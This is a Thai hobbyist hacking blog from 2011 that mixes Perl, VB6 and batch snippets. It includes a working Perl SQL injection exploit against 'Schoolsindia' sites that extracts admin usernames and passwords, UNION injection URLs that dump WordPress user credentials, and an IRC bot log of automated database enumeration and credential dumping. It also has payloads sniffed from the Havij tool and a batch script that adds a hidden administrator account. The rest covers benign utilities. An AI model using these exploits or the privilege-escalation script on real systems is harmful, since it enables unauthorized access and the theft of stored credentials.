หน้าเว็บ

วันเสาร์ที่ 27 สิงหาคม พ.ศ. 2554

SQLi Tool ใช้ Dump Data ข้าม DataBase ได้แล้ววว


เพิ่งมารู้ตอนเขียน IRC Bot เอง แหะๆ เลยถือโอกาสแก้บัคไปด้วยเลย เมื่อก่อนที่เขียนคือ Dump ได้แค่ database() หรือ Current DataBase เท่านั้น แต่ตอนนี้แก้ใหม่แล้วดั้มได้ทุก DB

from+database.table--

http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(ID,CHAR(32,58,32),user_login,CHAR(32,58,32),user_pass),2,3+from+wordpress.wp_users--

วันพฤหัสบดีที่ 25 สิงหาคม พ.ศ. 2554

เขียน Perl กับ Sub [ IRC ]

if ($svrmsg=~/all@!talk (.*)/)
{
$message=$1;
{if ($svrmsg=~/^\:$owner\!/){&talk;} # ส่งเข้า Sub
}
}
###### ใช้ Sub
sub talk{
print $connect "PRIVMSG ".$channel." :$message\r\n";
}

วันอังคารที่ 23 สิงหาคม พ.ศ. 2554

Hack SQLi Localhost ด้วย IRC Bot...

   <ICheer_No0M> all@!sqliscan localhost/sqlibug.php?id=1
<ICheer_BotZz> [+] Scanning Column in http://localhost/sqlibug.php?id=1
<ICheer_BotZz>
<ICheer_BotZz> [+] Found target : http://localhost/sqlibug.php?id=1+AND+1=2+UNION+ALL+SELECT+icheernoom,2,3
<ICheer_BotZz>
<ICheer_BotZz> [+] Scanning Error Path...
<ICheer_BotZz>
<ICheer_BotZz> [+] Cannot Find Error Path...
<ICheer_BotZz>
<ICheer_BotZz> DataBase Current : test
<ICheer_BotZz> DataBase User : root@localhost
<ICheer_BotZz> DataBase Version : 5.0.51b-community-nt-log
<ICheer_BotZz> OS Version : Win32
<ICheer_BotZz> Base Directory : C:\AppServ\MySQL\
<ICheer_BotZz> Data Directory : C:\AppServ\MySQL\data\
<ICheer_BotZz> Host Name : HACKED
<ICheer_BotZz>
<ICheer_BotZz> Host : 127.0.0.1
<ICheer_BotZz> User : root
<ICheer_BotZz> Password : 446a12100c856ce9
<ICheer_BotZz> Process_priv : Y
<ICheer_BotZz> File_priv : Y
<ICheer_BotZz> Execute_priv : Y
<ICheer_BotZz>
<ICheer_BotZz> [+] Count DataBase : 17
<ICheer_BotZz>
<ICheer_BotZz> [+] Found DataBase 1 : information_schema
<ICheer_BotZz> [+] Found DataBase 2 : aor
<ICheer_BotZz> [+] Found DataBase 3 : bigc
<ICheer_BotZz> [+] Found DataBase 4 : bookshop
<ICheer_BotZz> [+] Found DataBase 5 : com
<ICheer_BotZz> [+] Found DataBase 6 : db_test
<ICheer_BotZz> [+] Found DataBase 7 : dbsong
<ICheer_BotZz> [+] Found DataBase 8 : gallery3
<ICheer_BotZz> [+] Found DataBase 9 : icheer_botzz
<ICheer_BotZz> [+] Found DataBase 10 : joomla
<ICheer_BotZz> [+] Found DataBase 11 : kit
<ICheer_BotZz> [+] Found DataBase 12 : mysql
<ICheer_BotZz> [+] Found DataBase 13 : phpmyadmin
<ICheer_BotZz> [+] Found DataBase 14 : shell
<ICheer_BotZz> [+] Found DataBase 15 : smf
<ICheer_BotZz> [+] Found DataBase 16 : test
<ICheer_BotZz> [+] Found DataBase 17 : wordpress
<ICheer_BotZz>
<ICheer_BotZz> [+] Saving To MySQL DataBase...
<ICheer_BotZz>
<ICheer_BotZz> [+] Complete...
<ICheer_No0M> all@!sqlitable http://localhost/sqlibug.php?id=1+AND+1=2+UNION+ALL+SELECT+icheernoom,2,3 -db test
<ICheer_BotZz> [+] Count Table : 1
<ICheer_BotZz>
<ICheer_BotZz> [+] Found Table 1 : login
<ICheer_BotZz>
<ICheer_BotZz> [+] Done...
<ICheer_No0M> all@!sqlicolumn http://localhost/sqlibug.php?id=1+AND+1=2+UNION+ALL+SELECT+icheernoom,2,3 -db test -tb login
<ICheer_BotZz> [+] Count Column : 3
<ICheer_BotZz>
<ICheer_BotZz> [+] Found Columns : id,user,pass
<ICheer_BotZz>
<ICheer_BotZz> [+] Done...
<ICheer_No0M> all@!sqlidump http://localhost/sqlibug.php?id=1+AND+1=2+UNION+ALL+SELECT+icheernoom,2,3 -db test -tb login -cl id,user,pass
<ICheer_BotZz> [+] Count Row : 2
<ICheer_BotZz> [+] Row : id,user,pass
<ICheer_BotZz>
<ICheer_BotZz> [+] Dump 1 : 1 : <ICheer_No0M> : Password
<ICheer_BotZz> [+] Dump 2 : 2 : testuser : testpass
<ICheer_BotZz>
<ICheer_BotZz> [+] Export Link : http://localhost/sqlibug.php?id=1+AND+1=2+UNION+ALL+SELECT+group_concat(id,0x203a20,user,0x203a20,pass),2,3+from+test.login--
<ICheer_BotZz>
<ICheer_BotZz> [+] Done...


รูปเต็มๆคลิก http://bitimg.com/?di=613141124243

เอาไว้ลองบอท

วันอังคารที่ 16 สิงหาคม พ.ศ. 2554

Talk Function [ IRC Bot Perl ]

if ($svrmsg=~/all@!talk (.*)/) 
	{
	$message=$1;
	if ($svrmsg=~/^\:$owner\!/) 
		{
		print $connect "PRIVMSG ".$channel." :$message\r\n";
		}
	}

จดไว้กันลืม : D

วันจันทร์ที่ 15 สิงหาคม พ.ศ. 2554

OSI 7 Layers

- Physical Layer เคลื่อนย้ายข้อมูลระดับบิตจากโหนดหนึ่งไปยังโหนดถัดไป
- Data Link Layer เคลื่อนย้ายเฟรมจากโหนดหนึ่งไปยังโหนดถัดไป
- Network Layer ส่งมอบแพ็กเก็ตจากโฮสต์ต้นทางไปยังโฮสต์ปลายทา่ง
- Transport Layer ส่งมอบข่าวสารจากโปรเซสต้นทางไปยังโปรเซสปลายทาง
- Session Layer ควบคุมการสื่อสารและการซิงโครไนซ์
- Presentation Layer แปลงข้อมูล เข้ารหัสข้อมูล บีบอัดข้อมูล
- Application Layer จัดการงานบริการให้แก่ผู้ใช้

วันศุกร์ที่ 12 สิงหาคม พ.ศ. 2554

YouTube VDO Downloader [ Perl ]


#!/usr/bin/perl
# YOU MUST INSTALL "WWW::YouTube::Download" FIRST

# HOW TO INSTALL "WWW::YouTube::Download"
# [win32] (active perl)
# start>run
# ppm install WWW::YouTube::Download

# [NIX]
# sudo cpan
# install WWW::YouTube::Download

use HTTP::Cookies;
use LWP::UserAgent;
use WWW::YouTube::Download;

my $client = WWW::YouTube::Download->new;
my $cookie_jar = HTTP::Cookies->new(autosave =>1, hide_cookie2=>1);
my $browser = LWP::UserAgent->new(
  agent=>'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
  timeout=>8,
  max_redirect=>0,
  cookie_jar=>$cookie_jar
);
my $video_id = $ARGV[0];
if(!$video_id){
  print "[+] Input Youtube Link : ";
  chomp($video_id=<stdin>);
}
$video_id =~s/.*youtu((\.be\/)|(be\.com\/watch\?v=))([^\&\s]+).*/$4/;
my $suffix = $client->get_suffix($video_id);
my $you_down = $browser->get("http://tinyurl.com/api-create.php?url=".$client->get_video_url($video_id))->content;
print "[+] VDO_ID $video_id\n";
print "[+] ($suffix) $you_down\n";
<stdin>;

เข้า cmd แล้วพิมพ์ ppm install WWW::YouTube::Download จากนั้น Enter

แล้วรอจน Done นะครับ

วิธีใช้

youtube.pl youtu.be/lkjbnjJlFDk
youtube.pl 8YWQH29igJw
youtube.pl http://www.youtube.com/watch?v=lkjbnjJlFDk
youtube.pl youtube.com/watch?v=lkjbnjJlFDk
youtube.pl youtu.be/lkjbnjJlFDk

จากนั้นเอา http://tinyurl.com/455m9vy (ผลลัพธ์ที่ได้มา) ที่ได้ไปวางที่ Browser กด Enter ครับ

Script By windows98SE

URLEncode / URLDecode [ VB6 ]

Public Function URLdecshort(ByRef Text As String) As String
    Dim strArray() As String, lngA As Long
    strArray = Split(Replace(Text, "+", " "), "%")
    For lngA = 1 To UBound(strArray)
        strArray(lngA) = Chr$("&H" & Left$(strArray(lngA), 2)) & Mid$(strArray(lngA), 3)
    Next lngA
    URLdecshort = Join(strArray, vbNullString)
End Function
Public Function URLencshort(ByRef Text As String) As String
    Dim lngA As Long, strChar As String
    For lngA = 1 To Len(Text)
        strChar = Mid$(Text, lngA, 1)
        If strChar Like "[A-Za-z0-9]" Then
        ElseIf strChar = " " Then
            strChar = "+"
        Else
            strChar = "%" & Right$("0" & Hex$(Asc(strChar)), 2)
        End If
        URLencshort = URLencshort & strChar
    Next lngA
End Function
# Using #
Private Sub Command1_Click()
Text2.Text = URLencshort(Text1.Text)
End Sub

Ref : http://www.vbforums.com/showthread.php?t=541683

วันพฤหัสบดีที่ 11 สิงหาคม พ.ศ. 2554

Thai Gen ID [ Perl Version. เกรียนๆ ]


print "\tThai Generator ID By ICheer_No0M\n\n";
print "Input Round : ";
 chomp($input=<stdin>);
 for($i=1;$i<=$input;$i++)
{
 $id1 = int(rand(9));
 $id2 = int(rand(9));
 $id3 = int(rand(9));
 $id4 = int(rand(9));
 $id5 = int(rand(9));
 $id6 = int(rand(9));
 $id7 = int(rand(9));
 $id8 = int(rand(9));
 $id9 = int(rand(9));
 $id10 = int(rand(9));
 $id11 = int(rand(9));
 $id12 = int(rand(9));
 $step1=($id1*13)+($id2*12)+($id3*11)+($id4*10)+($id5*9)+($id6*8)+($id7*7)+($id8*6)+($id9*5)+($id10*4)+($id11*3)+($id12*2);
 $step2=$step1%11;
 $step3=11-$step2;
 if ($step3==11){
   $step3=1;
}
elsif ($step3==10){
   $step3=0;
}
 print ("\nThai ID ".$i." : ".$id1."-",$id2,$id3,$id4,$id5."-",$id6,$id7,$id8,$id9,$id10."-",$id11,$id12."-",$step3)."\n";
 }
<stdin>;

รู้ว่ามีคนเขียนเยอะแล้ว แต่ก็อยากลองเขียนดูบ้างครับ ^_^

วันอังคารที่ 9 สิงหาคม พ.ศ. 2554

Powered By Schoolsindia SQL Injection Vulnerability [ Perl ]



use LWP::UserAgent;

print "[+] Powered By Schoolsindia SQL Injection Vulnerability\n";
print "[+] By ICheer_No0M\n\n";
print "[+] Input URL : ";
chomp($url=<stdin>);
print "[+] Input ID : ";
chomp($id=<stdin>);
$ids=$id-1;
$user="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(user_name),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$pass="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(pass_word),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$second=",1--";
$usertarget=$url.$user.$ids.$second;
$passtarget=$url.$pass.$ids.$second;
unless ($usertarget=~/^http:\/\//) {$usertarget='http://'.$usertarget;}
unless ($passtarget=~/^http:\/\//) {$passtarget='http://'.$passtarget;}
$get=LWP::UserAgent->new->get($usertarget)->content;
if($get =~ /icheer_noom!(.*)#icheer_noom/) 
{
print "[+] User : $1\n";
}
else
{
print "[-] Failed !!!\n";
}
$get2=LWP::UserAgent->new->get($passtarget)->content;
if ($get2 =~ /icheer_noom!(.*)#icheer_noom/)
{
print "[+] Password : $1\n";
print "[-] Finish !!!\n";
}
else
{
print "[-] Failed !!!\n";
print "[-] Finish !!!\n";
}
<stdin>;

Ref : http://www.1337day.com/exploits/16633

วันจันทร์ที่ 8 สิงหาคม พ.ศ. 2554

Response Code Checking [ Perl ]

use LWP::UserAgent;

print "[+] Basic Response Code Checking\n";
print "[+] Input URL : ";
chomp($url=<stdin>);
unless ($url=~/^http:\/\//) {$url='http://'.$url;}
$ua = LWP::UserAgent->new(agent => 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)');
$res = $ua->get($url);
if($res->status_line =~ /200/)
{
$status=$res->status_line;
print "\n[+] $url : $status";
}
else
{
$status=$res->status_line;
print "\n[-] $url : $status";
}
<stdin>;

อันนี้ลองเขียนเองมั่วๆดูน่ะครับ ^^

FTP Directory Upload [ Perl ]

use File::Basename;
use Net::FTP;
my $directory = $ARGV[0];
my @parts = split(/\\/, $directory);
my $length = $parts;
my $dateDir = $parts[$length-1];
$ftp = Net::FTP->new("ftp.host.com", Debug => 1) # ใส่ ftp host 
    or die "Cannot connect to hostname: $@";
$ftp->login("username", "password") # ใส่ username,password login เข้า ftp
    or die "Cannot login ", $ftp->message;
$ftp->cwd("/images") # ใส่ path ที่ต้องการอัพไฟล์เข้าไป
    or die "Cannot change working directory ", $ftp->message;
$ftp->mkdir($dateDir);
$ftp->cwd($dateDir);
$ftp->binary();
opendir(DIR, "$directory");
my @files = readdir(DIR);
foreach my $file (@files)
    {
    if (not -d $file)
        {
        $file = lc($file);
        $ftp->put("$directory\\$file");
        }
    }
$ftp->quit();

How to use : C:\Documents and Settings\Administrator\Desktop>ftpup.pl C:\test\

จากนั้นรอซักพักโฟลเดอร์ test ก็จะถูกอัพไปไว้ที่เว็บ ftp ที่เราเซ็ตค่าไว้แล้วครับ ...

Thank : http://www.reviewmylife.co.uk

วันเสาร์ที่ 6 สิงหาคม พ.ศ. 2554

Add User , Enabled User [ Batch ]

@echo off
net user add Guest hack /add  # เพิ่ม User : Guest , Password : hack 
net user Guest hack /active:yes # Enabled User Guest 
net localgroup administrators Guest /add # เพิ่ม Guest ให้อยู่ในกลุ่มของ Admin (ยกระดับสิทธิ์) 
pause

คงไม่ต้องบอกนะครับว่าใช้อย่างไร Have Fun ~

วันศุกร์ที่ 5 สิงหาคม พ.ศ. 2554

Tool ที่เขียน Dump user,pass ของ Wp ใน Localhost ไม่ได้ ~!!

          เนื่องจากผมเขียน SQLi Tool มาลองกับ localhost ตัวเองคือเขียนไฟล์ php ให้บัค SQLi แล้วลองสแกนดู เครื่องผมลง cms ไว้ 3 ตัวคือ wp,smf,joomla ก็เลยลอง dump ข้อมูลใน wp ดูมันไม่ได้ ว่าจะลองเขียนใหม่เลยลอง sniff เจ้า havij ดูเพื่อจะดูว่ามันทำยังไง แล้วเราก็มาเขียนใน tool เรา แอบเกรียน ฮร่าๆ



อ่า sniff เสร็จแล้วผลลัพธ์ก็คือ

-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(wp_users.user_login%20as%20char)),0x27,0x7e)%20FROM%20`wordpress`.wp_users%20LIMIT%200,1)%20,0x31303235343830303536,0x31303235343830303536-- ## Dump User
-999.9%20UNION%20ALL%20SELECT%20(SELECT%20concat(0x7e,0x27,Hex(cast(wp_users.user_pass%20as%20char)),0x27,0x7e)%20FROM%20`wordpress`.wp_users%20LIMIT%200,1)%20,0x31303235343830303536,0x31303235343830303536-- ## Dump Pass

โอเคพอจะได้แนวแล้ว ไปเขียนต่อดีกว่า ขอขอบคุณ Socket Sniff ที่ช่วยในการ Sniff ครั้งนี้ด้วยครับ ~